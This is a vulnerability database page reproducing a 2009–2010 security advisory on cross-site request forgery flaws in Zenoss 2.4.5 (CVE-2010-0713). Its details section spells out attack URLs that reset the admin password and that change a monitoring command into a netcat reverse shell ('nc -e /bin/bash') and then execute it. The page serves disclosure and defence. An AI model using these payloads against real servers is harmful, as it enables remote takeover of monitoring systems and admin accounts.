SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Zenoss 2.4.5 Multiple Admin CSRF


Arrow  SecurityAlert : 7057
Arrow  CVE : CVE-2010-0713
Arrow  CWE : CWE-352
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : Yes
Arrow  Exploit Available : Yes
Arrow  Credit : Adam Baldwin
Arrow  Published : 02.03.2010

Arrow  Affected Software : zenoss:zenoss:2.3.3
zenoss:zenoss:2.4.5 and previous versions



Arrow  Advisory Content :  

nGenuity Information Services - Security Advisory

Advisory ID: NGENUITY-2010-002 - Zenoss Multiple Admin CSRF
Application: Zenoss 2.3.3
Vendor: Zenoss
Vendor website: http://www.zenoss.com
Author: Adam Baldwin (adam_baldwin (at) ngenuity-is (dot) com
[email concealed])

I. BACKGROUND
Zenoss is a commercial and open source systems and network monitoring
tool. Much
of the applications functionality is accessible via a front end web
application.

II. DETAILS

Multiple CSRF vulnerabilities exist that can allow for arbitrary
commands to be executed on the Zenoss server as well as reset the
Zenoss
admin password.

Attack scenario: If an administrator has an active Zenoss
session and visits one of these links or visits a malicious page that
contains resources to point to these URL's

1. Reset user password to a known state Cross-Site Request Forgery CSRF,
in this case the password is reset to letmein.

http://172.16.28.5:8080/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1
&

defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefre
sh:

boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&page
r=&

password=letmein&sndpassword=letmein&zenScreenName=editUserSettings

2. Change and execute a command CSRF.
Change the ping command to be a netcat shell out to a remote system.
In
this case an internal system running on port 443

http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
/bin/bash 172.16.28.6 443&commandId=ping&description:text=&
manage_editUserCommand:method=Save&zenScreenName=userCommandDetail

Execute the new "ping" command:

http://172.16.28.5:8080/zport/dmd/Devices/devices/localhost/manage_doUse
rCommand?commandId=ping

III. REFERENCES
[1] - http://www.zenoss.com

IV. VENDOR COMMUNICATION
3.10.2009 - Vulnerability Discovery
8.21.2009 - Requested status from vendor
9.29.2009 - Vendor call (Fix pending)

Copyright (c) 2009 nGenuity Information Services, LLC



Arrow  References :

http://www.zenoss.com/news/SQL-Injection-and-Cross-Site-Forgery-in-Zenoss-Core-Corrected.html
http://www.securityfocus.com/bid/37843
http://www.securityfocus.com/archive/1/archive/1/508982/100/0/threaded
http://www.ngenuity.org/wordpress/2010/01/14/ngenuity-2010-002-zenoss-multiple-admin-csrf/
http://secunia.com/advisories/38195
http://osvdb.org/61805




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.